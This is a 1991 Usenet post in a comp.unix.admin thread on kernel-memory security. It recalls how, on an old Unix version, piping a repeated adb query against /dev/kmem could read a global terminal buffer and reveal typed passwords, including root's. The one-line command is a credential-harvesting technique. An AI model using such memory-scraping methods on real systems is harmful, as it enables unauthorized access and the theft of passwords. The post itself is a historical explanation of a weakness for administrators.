Path: utzoo!utgpu!news-server.csri.toronto.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!cs.utexas.edu!sun-barr!apple!portal!cup.portal.com!ts
From: ts@cup.portal.com (Tim W Smith)
Newsgroups: comp.unix.admin
Subject: Re: Kmem security (was: Re: How do you make your UNIX crash ???
Message-ID: <40479@cup.portal.com>
Date: 23 Mar 91 09:52:02 GMT
References: <513@bria> <1991Mar12.132003.27383@cs.widener.edu>
  <1991Mar18.153201.23325@lth.se> <601@minya.UUCP>
Organization: The Portal System (TM)
Lines: 23

A lot depends on how your terminal driver works.  For instance, there
was one version of Unix (32V, I believe), whose terminal driver used
a global buffer for canonicalization.  On this system, you would
just do something like

	yes "_canonb/S" | adb /unix /dev/kmem

and sit back and wait.

Sure, you got a lot of garbage.  But every so often, you would see
something like:
	
	_canonb: root

followed by

	_canonb: foobar

where foobar would be a pretty good thing to try for the root
password.  Sometimes it was wrong, but sometimes it was right,
and that's enough.

					Tim Smith